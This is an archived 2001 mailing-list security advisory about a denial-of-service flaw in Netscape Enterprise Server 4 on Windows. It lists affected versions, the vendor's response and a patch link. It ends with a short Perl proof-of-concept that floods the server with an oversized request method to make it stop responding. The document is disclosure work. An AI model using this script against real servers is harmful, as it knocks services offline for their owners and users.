Netscape Enterprise Server 4 Method and URI overflow

From: Robert Cardona (dasquid@digizen-security.com)
Date: Sat May 19 2001 - 12:27:14 PDT

Next message: Cy Schubert - ITSD Open Systems Group: "Re: Mail delivery privileges (was: Solaris /usr/bin/mailx exploit)"

Previous message: Greg A. Woods: "Re: Mail delivery privileges (was: Solaris /usr/bin/mailx exploit)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Digizen Security Group advisory, 2001
Netscape Enterprise Server 4 Method and URI overflow

Systems affected:
Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on
Windows NT and Win2k

Risk: Denial of Service
Date: 18 May 2001
Vendor Notified: 25 April 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto
Cardona. You
may distribute it unmodified.  You may not modify it and distribute it or
distribute
parts of it without the author's  written permission.

Disclaimer:
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use of this information.
Any use of this information is at the user's own risk.

Description:

By sending an invalid method or URI request of 4022 bytes Netscape
Enterprise Server will
stop responding to requests.

Vendor Status:
Netscape was informed and responded on the same business day.

Vendor's Response:

The security & stability of iPlanet's customer's environments is one of
our paramount concerns. To ensure the stability of our customer's
environments iPlanet has made available an NSAPI patch that can be
applied to iPlanet Web Server, Enterprise Edition version 4.1 Service
Packs 3 through 7. The NSAPI patch is available at
http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
This issue will also be addressed by the release of iPlanet Web Server,
Enterprise Edition version 4.1 Service Pack 8.

----------------------------------------------------------------------------
----------
#!/usr/bin/perl
use IO::Socket;
  if (@ARGV < 2)  {
     print "Usage: host port\n";
     exit;
   }
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
  $sock= IO::Socket::INET->new(Proto=>"TCP",
			     PeerAddr=>$ARGV[0],
			     PeerPort=>"$ARGV[1]",)
			     or die "Cant connect to $ARGV[0]: $!\n";
  $sock->autoflush(1);
  print $sock "$overflow /index.html HTTP/1.0\n\n";
  $response=<$sock>;
  print "$response";
  while(<$sock>){
     print "$_\n";
  }
  close $sock;
}

Next message: Cy Schubert - ITSD Open Systems Group: "Re: Mail delivery privileges (was: Solaris /usr/bin/mailx exploit)"
Previous message: Greg A. Woods: "Re: Mail delivery privileges (was: Solaris /usr/bin/mailx exploit)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat May 19 2001 - 18:01:26 PDT